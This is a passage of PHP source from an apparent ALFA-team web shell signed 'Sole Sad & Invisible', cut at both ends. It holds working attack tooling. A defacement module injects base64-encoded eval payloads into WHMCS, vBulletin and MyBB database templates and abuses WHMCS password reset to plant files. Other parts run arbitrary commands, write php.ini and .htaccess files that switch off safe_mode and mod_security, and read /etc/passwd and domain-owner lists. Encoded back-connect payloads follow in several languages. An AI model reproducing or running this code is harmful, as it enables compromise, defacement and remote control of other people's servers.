\'tdName\' => \'Mysql Host\', \'inputName\' => \'dbh\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'URL\', \'inputName\' => \'path\', \'inputValue\' => \'http://site.com/whmcs\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'File Name\', \'inputName\' => \'fname\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'inputName\' => \'dbn\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'inputName\' => \'dbu\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'inputName\' => \'dbp\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><div class=\'txtfont\'>| Your Index |</div><br>\r\n<textarea name=index rows=\'19\' cols=\'103\'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\r\n<input type=\'submit\' value=\' \'>\r\n</form></center></center>";\r\nif(isset($_POST[\'alfa6\'])){\r\n$s0levisible="Powered By Solevisible";\r\n$dbu = $_POST[\'alfa6\'];\r\n$path = $_POST[\'alfa5\'];\r\n$fname = $_POST[\'alfa4\'];\r\n$dbn = $_POST[\'alfa7\'];\r\n$dbp = $_POST[\'alfa8\'];\r\n$dbh = $_POST[\'alfa9\'];\r\n$index = $_POST[\'alfa10\'];\r\n$index = str_replace("\\\'","\'",$index);\r\n$deface = \'$x = base64_decode("\'.__ZW5jb2Rlcg($index).\'"); $solevisible = fopen("\'.$fname.\'","w"); fwrite($solevisible,$x);\';\r\n$saveData = __ZW5jb2Rlcg($deface);\r\n$Def = \'{php}eval(base64_decode("\'.$saveData.\'"));{/php}\';\r\nif(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){\r\n$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));\r\n$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name=\'Password Reset Validation\'");\r\n$soleGet = mysqli_fetch_assoc($soleSave);\r\n$tempSave1 = $soleGet[\'message\'];\r\n$tempSave = str_replace("\'","\\\'",$tempSave1);\r\n$inject = "UPDATE tblemailtemplates SET message=\'$Def\' WHERE name=\'Password Reset Validation\'";\r\n$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));\r\n$create = "insert into tblclients (email) values(\'solevisible@fbi.gov\')";\r\n$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));\r\nif(function_exists(\'curl_version\')){\r\n$AlfaSole = new AlfaCURL(true);\r\n$saveurl = $AlfaSole->Send($path."/pwreset.php");\r\n$getToken = preg_match("/name=\\"token\\" value=\\"(.*?)\\"/i",$saveurl,$token);\r\n$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");\r\n$backdata = "UPDATE tblemailtemplates SET message=\'{$tempSave}\' WHERE name=\'Password Reset Validation\'";\r\n$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));\r\n__alert(\'File Created...\');\r\necho "<br><pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><center><font color=red><a target=\'_blank\' href=\'".$path."/".$fname."\'>Click Here !</a></font></b></center><br><br>";\r\n}else{\r\necho "<br><pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><center><b><font color=\\"#FFFFFF\\">Please go to Target </font><font color=red>\\" ".$path."/pwreset.php \\"</font><br/><font color=\\"#FFFFFF\\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\\"#FFFFFF\\">and go to</font> <font color=red>\\" ".$path."/".$fname." \\"</font></b></center><br><br>";\r\n}}}}\r\nif(isset($_POST[\'alfa1\']) && ($_POST[\'alfa1\'] == \'vb\')){\r\necho __pre();\r\n\r\necho "<center><center><div class=\'txtfont_header\'>| vBulletin |</div>\r\n<p><center>".getConfigHtml(\'vb\')."<form onSubmit=\\"g(\'IndexChanger\',null,\'vb\',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,\'>>\'); return false;\\">\r\n";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'inputName\' => \'dbh\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'inputName\' => \'dbn\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'inputName\' => \'dbu\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'inputName\' => \'dbp\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Prefix\', \'inputName\' => \'prefix\', \'id\' => \'db_prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><div class=\'txtfont\'>| Your Index |</div><br>\r\n<textarea name=\'index\' rows=\'19\' cols=\'103\'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\r\n<input type=\'submit\' value=\' \'></form></center></center>";\r\nif($_POST[\'alfa8\']==\'>>\'){\r\n$s0levisible="Powered By Solevisible";\r\n$dbu = $_POST[\'alfa2\'];\r\n$dbn = $_POST[\'alfa3\'];\r\n$dbp = $_POST[\'alfa4\'];\r\n$dbh = $_POST[\'alfa5\'];\r\n$index = $_POST[\'alfa6\'];\r\n$prefix = $_POST[\'alfa7\'];\r\n$index=str_replace("\\\'","\'",$index);\r\n$set_index = "{\\${eval(base64_decode(\\\'";\r\n$set_index .= __ZW5jb2Rlcg("echo \\"$index\\";");\r\n$set_index .= "\\\'))}}{\\${exit()}}";\r\nif(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){\r\n$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));\r\n$loli1 = "UPDATE ".$prefix."template SET template=\'".$set_index."".$s0levisible."\' WHERE title=\'spacer_open\'";\r\n$loli2 = "UPDATE ".$prefix."template SET template=\'".$set_index."".$s0levisible."\' WHERE title=\'FORUMHOME\'";\r\n$loli3 = "UPDATE ".$prefix."style SET css=\'".$set_index."".$s0levisible."\', stylevars=\'\', csscolors=\'\', editorstyles=\'\'";\r\n@mysqli_query($conn,$loli1) or die (mysqli_error($conn));\r\n@mysqli_query($conn,$loli2) or die (mysqli_error($conn));\r\n@mysqli_query($conn,$loli3) or die (mysqli_error($conn));\r\n__alert(\'VB index changed...!\');\r\n}\r\n}\r\n}\r\nif(isset($_POST[\'alfa2\']) && ($_POST[\'alfa2\'] == \'mybb\')) {\r\necho __pre();\r\n\r\necho "<center><center><div class=\'txtfont_header\'>| Mybb |</div>\r\n<p><center>".getConfigHtml(\'mybb\')."<form onSubmit=\\"g(\'IndexChanger\',null,\'null\',\'mybb\',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\\" method=POST action=\'\'>\r\n";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'inputName\' => \'mybbdbh\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'inputName\' => \'mybbdbn\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'inputName\' => \'mybbdbu\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'inputName\' => \'mybbdbp\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><div class=\'txtfont\'>| Your Index |</div><br>\r\n<textarea name=mybbindex rows=\'19\' cols=\'103\'>\r\n<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type=\'submit\' value=\'\' ></p></form></center></center>";\r\nif(isset($_POST[\'alfa6\'])){\r\n$mybb_dbh = $_POST[\'alfa6\'];\r\n$mybb_dbu = $_POST[\'alfa7\'];\r\n$mybb_dbn = $_POST[\'alfa8\'];\r\n$mybb_dbp = $_POST[\'alfa9\'];\r\n$mybb_index = $_POST[\'alfa10\'];\r\nif(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){\r\n$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));\r\n$prefix="mybb_";\r\n$loli7 = "UPDATE ".$prefix."templates SET template=\'".$mybb_index."\' WHERE title=\'index\'";\r\n$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));\r\n__alert(\'MyBB index changed...!\');\r\n}\r\n}\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfaproc()\r\n{\r\nalfahead();\r\necho "<Div class=header><br><center>";\r\nif(empty($_POST[\'ajax\'])&&!empty($_POST[\'alfa1\']))\r\n$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\nif($GLOBALS[\'sys\']=="win"){\r\n$process=array(\r\n"Task List" =>"tasklist /V",\r\n"System Info" =>"systeminfo",\r\n"Active Connections" => "netstat -an",\r\n"Running Services" => "net start",\r\n"User Accounts" => "net user",\r\n"Show Computers" => "net view",\r\n"ARP Table" => "arp -a",\r\n"IP Configuration" => "ipconfig /all"\r\n);}else{\r\n$process=array(\r\n"Process status" => "ps aux",\r\n"Syslog" =>"cat /etc/syslog.conf",\r\n"Resolv" => "cat /etc/resolv.conf",\r\n"Hosts" =>"cat /etc/hosts",\r\n"Cpuinfo"=>"cat /proc/cpuinfo",\r\n"Version"=>"cat /proc/version",\r\n"Sbin"=>"ls -al /usr/sbin",\r\n"Interrupts"=>"cat /proc/interrupts",\r\n"lsattr"=>"lsattr -va",\r\n"Uptime"=>"uptime",\r\n"Fstab" =>"cat /etc/fstab"\r\n);}\r\nforeach($process as $n => $link){\r\necho \'<a href="javascript:void(0);" onclick="g(\\\'proc\\\',null,\\\'\'.$link.\'\\\')"> | \'.$n.\' | </a>\';\r\n}\r\necho "</center><br>";\r\nif(!empty($_POST[\'alfa1\'])){\r\necho "<pre class=\'ml1\' style=\'margin-top:5px\' >";\r\nif($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd \'".addslashes($_POST["c"])."\';";}\r\necho alfaEx($cmd.$_POST[\'alfa1\'], true);\r\necho \'</pre>\';\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfasafe(){\r\nalfahead();\r\necho "<div class=header><center><br><div class=\'txtfont_header\'>| Auto ByPasser |</div>";\r\necho \'<h3><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,\\\'ini\\\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,\\\'pl\\\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,null,\\\'passwd\\\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,null,null,\\\'users\\\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,null,null,null,\\\'valiases\\\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,null,null,null,null,null,null,null,\\\'domains\\\')">| Get-Domains | </a></center></h3>\';\r\nif(!empty($_POST[\'alfa8\']) && isset($_POST[\'alfa8\']) == \'domains\'){\r\nif(!_alfa_file_exists("/etc/virtual/domainowners")){\r\necho __pre();\r\n$solevisible9 = _alfa_file(\'/etc/named.conf\');\r\nif(is_array($solevisible9)){\r\nforeach($solevisible9 as $solevisible13){\r\nif(@eregi(\'zone\',$solevisible13)){\r\npreg_match_all(\'#zone "(.*)"#\',$solevisible13,$solevisible14);\r\nif(strlen(trim($solevisible14[1][0])) > 2){\r\necho $solevisible14[1][0].\'<br>\';\r\n}}}\r\n}\r\n}else{\r\necho __pre();\r\n$users = _alfa_file("/etc/virtual/domainowners");\r\nif(is_array($users)){\r\nforeach($users as $boz){\r\n$dom = explode(":",$boz);\r\necho $dom[0]."\\n";}}}}\r\nif(!empty($_POST[\'alfa6\']) && isset($_POST[\'alfa6\']) == \'valiases\'){\r\necho \'\r\n<form onsubmit="g(\\\'safe\\\',null,null,null,null,null,null,\\\'valiases\\\',this.site.value,null,\\\'>>\\\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>\';\r\nif(isset($_POST[\'alfa9\']) && $_POST[\'alfa9\'] == \'>>\'){\r\nif(!_alfa_file_exists("/etc/virtual/domainowners")){\r\n$site = trim($_POST[\'alfa7\']);\r\n$rep = str_replace(array("https://","http://","www."),"",$site);\r\n$user = "";\r\nif(function_exists("posix_getpwuid") && function_exists("fileowner")){\r\n\tif($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){\r\n\t\t$user = $user[\'name\'];\r\n\t}\r\n}else{\r\n\tif(_alfa_can_runCommand(true,true)){\r\n\t\t$user = alfaEx("stat -c \'%U\' /etc/valiases/".$rep);\r\n\t}\r\n}\r\nif(!empty($user)&&$user!=\'root\'){\r\necho __pre()."<center><table border=\'1\'><tr><td><b><font color=\\"#FFFFFF\\">User: </b></font></td><td><b><font color=\\"#FF0000\\">{$user}</font></b></td></tr><tr><td><b><font color=\\"#FFFFFF\\">site: </b></font></td><td><b><font color=\\"#FF0000\\">{$rep}</font></b></td></tr></table></center>";\r\n}else {echo __pre().\'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>\';}\r\n}else{\r\n$site = trim($_POST[\'alfa7\']);\r\n$rep = str_replace(array("https://","http://","www."),"",$site);\r\n$users = _alfa_file("/etc/virtual/domainowners");\r\nforeach($users as $boz){\r\n$ex = explode(":",$boz);\r\nif($ex[0] == $rep){\r\necho __pre()."<center><table border=\'1\'>\r\n<tr><td><b><font color=\\"#FFFFFF\\">User: </b></font></td><td><b><font color=\\"#FF0000\\">".trim($ex[1])."</font></b></td></tr>\r\n<tr><td><b><font color=\\"#FFFFFF\\">site: </b></font></td><td><b><font color=\\"#FF0000\\">{$rep}</font></b></td></tr></table></center>";break;}}}}}\r\nif(!empty($_POST[\'alfa5\']) && isset($_POST[\'alfa5\'])){\r\nif(!_alfa_file_exists("/etc/virtual/domainowners")){\r\necho __pre();\r\n$i = 0;\r\nwhile ($i < 60000) {\r\n$line = @posix_getpwuid($i);\r\nif (!empty($line)) {\r\nwhile (list ($key, $vl) = each($line)){\r\necho $vl."\\n";\r\nbreak;}}$i++;}\r\n}else{echo __pre();\r\n$users = _alfa_file("/etc/virtual/domainowners");\r\nforeach($users as $boz){\r\n$user = explode(":",$boz);\r\necho trim($user[1]).\'<br>\';}}}\r\nif(!empty($_POST[\'alfa4\']) && isset($_POST[\'alfa4\'])){\r\necho __pre();\r\nif(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){\r\nfor($uid=0;$uid<60000;$uid++){\r\n$ara = @posix_getpwuid($uid);\r\nif(!empty($ara)){\r\nwhile(list ($key, $val) = each($ara)){\r\necho "$val:";\r\n}echo "\\n";}}\r\n}else{__alert(\'failed...\');}}\r\nif(!empty($_POST[\'alfa2\']) && isset($_POST[\'alfa2\'])){\r\n@__write_file($GLOBALS[\'cwd\'].".htaccess","#Generated By Sole Sad and Invisible\\n<IfModule mod_security.c>\\nSec------Engine Off\\nSec------ScanPOST Off\\n</IfModule>");\r\necho \'<center><b><big>htaccess for Apache created...!</center></b></big>\';\r\n}\r\nif(!empty($_POST[\'alfa1\'])&& isset($_POST[\'alfa1\'])){\r\n@__write_file($GLOBALS[\'cwd\']."php.ini","safe_mode=OFF\\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");\r\necho \'<center><b><big> php.ini created...!</center></b></big>\';\r\n}\r\nif(!empty($_POST[\'alfa3\']) && isset($_POST[\'alfa3\'])){\r\n@__write_file($GLOBALS[\'cwd\'].".htaccess","#Generated By Sole Sad and Invisible\\n<Files *.php>\\nForceType application/x-httpd-php4\\n</Files>\\n<IfModule mod_security.c>\\nSecFilterEngine Off\\nSecFilterScanPOST Off\\n</IfModule>");\r\necho \'<center><b><big>htaccess for Litespeed created...!</center></b></big>\';\r\n}\r\necho "<br></div>";\r\nalfafooter();\r\n}\r\nfunction __get_resource($content){\r\nreturn @gzinflate(__ZGVjb2Rlcg($content));\r\n}\r\nfunction __write_file($file, $content){\r\nif($fh = @fopen($file, "wb")){\r\nif(fwrite($fh, $content)!==false) return true;\r\n}\r\nreturn false;\r\n}\r\nfunction bcinit($evalType, $evalCode, $evalOptions, $evalArguments){\r\n$res = "<font color=\'green\'>[ Success...! ]</font>";\r\n$err = "<font color=\'red\'>[ Failed...! ]</font>";\r\nif($evalOptions!="") $evalOptions = $evalOptions." ";\r\nif($evalArguments!="") $evalArguments = " ".$evalArguments;\r\nif($evalType=="c"){\r\n$tmpdir = ALFA_TEMPDIR;\r\nchdir($tmpdir);\r\nif(is_writable($tmpdir)){\r\n$uniq = substr(md5(time()),0,8);\r\n$filename = $evalType.$uniq.".c";\r\n$path = $filename;\r\nif(__write_file($path, $evalCode)){\r\n$ext = ($GLOBALS[\'sys\']==\'win\')? ".exe":".out";\r\n$pathres = $filename.$ext;\r\n$evalOptions = "-o ".$pathres." ".$evalOptions;\r\n$cmd = "gcc ".$evalOptions.$path;\r\nalfaEx($cmd);\r\nif(is_file($pathres)){\r\nif(chmod($pathres, 0755)){\r\n$cmd = $pathres.$evalArguments;\r\nalfaEx($cmd);\r\n}else{$res = $err;}\r\nunlink($pathres);\r\n}else{$res = $err;}\r\nunlink($path);\r\n}else{$res = $err;}\r\n}\r\nreturn $res;\r\n}elseif($evalType=="java"){\r\n$tmpdir = ALFA_TEMPDIR;\r\nchdir($tmpdir);\r\nif(is_writable($tmpdir)){\r\nif(preg_match("/class\\ ([^{]+){/i",$evalCode, $r)){\r\n$classname = trim($r[1]);\r\n$filename = $classname;\r\n}else{\r\n$uniq = substr(md5(time()),0,8);\r\n$filename = $evalType.$uniq;\r\n$evalCode = "class ".$filename." { ".$evalCode . " } ";\r\n}\r\n$path = $filename.".java";\r\nif(__write_file($path, $evalCode)){\r\n$cmd = "javac ".$evalOptions.$path;\r\nalfaEx($cmd);\r\n$pathres = $filename.".class";\r\nif(is_file($pathres)){\r\nif(chmod($pathres, 0755)){\r\n$cmd = "java ".$filename.$evalArguments;\r\nalfaEx($cmd);\r\n}else{$res = $err;}\r\nunlink($pathres);\r\n}else{$res = $err;}\r\nunlink($path);\r\n}else{$res = $err;}\r\n}\r\nreturn $res;\r\n}\r\nreturn false;\r\n}\r\nfunction alfaconnect(){\r\nalfahead();\r\n$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";\r\n$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";\r\n$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";\r\n$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";\r\n$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";\r\n$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";\r\n$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg